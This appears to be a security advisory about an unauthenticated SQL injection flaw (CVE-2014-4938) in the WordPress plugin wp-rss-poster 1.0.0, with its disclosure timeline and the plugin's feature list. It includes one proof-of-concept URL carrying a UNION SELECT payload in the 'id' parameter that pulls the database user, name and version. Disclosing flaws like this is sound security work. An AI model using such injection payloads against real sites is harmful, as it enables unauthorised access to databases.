wp-plugin : wp-rss-poster – A1-Injection

 

Plugin Details

 

Plugin Name : wp-rss-poster

 

Effected Version : 1.0.0 (and most probably lower version's if any)

 
Vulnerability : A1-Injection
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-admin/admin.php?page=wrp-add-new&id=2 union select 1,user(),database(),4,5,6,7,8,9,10,11,12,13,14,15,@@version,17,18

Here the parameter “id” is susceptible. The root cause is the usage of client input $_GET[‘id’] directly in the plugin.

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-23

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4938

 
Plugin Description :
 
**Main Features:**

1. Easy to create post from multiple rss sources.
2. Specify post categories, author, publish date.
3. Customize formats using flexible post templates.
4. Unix cron and WP internal cron jobs for feed update.
5. Cache images on the WordPress Media Library.
6. Twitter and facebook support.

**More info:**

* Find out more great [WordPress plugins](http://plugins.wp-coder.net/)

Leave a Reply

Your email address will not be published. Required fields are marked *